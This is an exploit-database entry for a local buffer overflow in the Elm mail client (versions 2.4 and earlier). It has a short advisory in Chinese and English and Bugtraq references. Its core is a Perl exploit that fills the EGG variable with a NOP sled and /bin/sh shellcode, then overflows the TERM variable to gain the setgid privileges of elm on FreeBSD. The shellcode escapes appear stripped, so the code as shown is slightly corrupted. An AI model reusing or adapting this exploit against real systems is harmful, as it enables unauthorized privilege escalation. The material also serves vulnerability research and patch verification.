https://www.exploit-db.com/exploits/22836
https://www.securityfocus.com/bid/83053
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199705-012

Elm2.4及早期版本存在缓冲区溢出漏洞。本地用户可以通过一个超长的环境变量获得权限。

source: http://www.securityfocus.com/bid/8030/info

A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun.

As Elm is installed setgid on some systems, the exploitation of this vulnerability could potentially allow for the elevation of local privileges.

# DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# reinventing the wheel, http://www.insecure.org/sploits/elm.curses.overflow.html
# shellcode by zillionATsafemode.org
# ko-elm-2.4h4.1      ELM Mail User Agent, patched for Korean E-Mail
# elm is setgid 'bin' 

$len = 512;
$ret = 0xbfbffd68;
$nop = "x90";
$offset = 0;
$shellcode = 	"x31xc0x50x50xb0x17xcdx80x31xc0x50x68".
		"x2fx2fx73x68x68x2fx62x69x6ex89xe3x50".
		"x54x53x50xb0x3bxcdx80x31xc0xb0x01xcdx80";
              
if (@ARGV == 1) {
    $offset = $ARGV[0];
}
  
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));
local($ENV{'EGG'}) = $buffer; 
local($ENV{'TERM'}) = $new_ret x 12; 
exec("elm");

Elm Development Group ELM 2.4

Elm Development Group ELM 2.3

来源:BUGTRAQ
名称:19970514Re:ELMoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420970&w=2
来源:BUGTRAQ
名称:19970513
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420967&w=2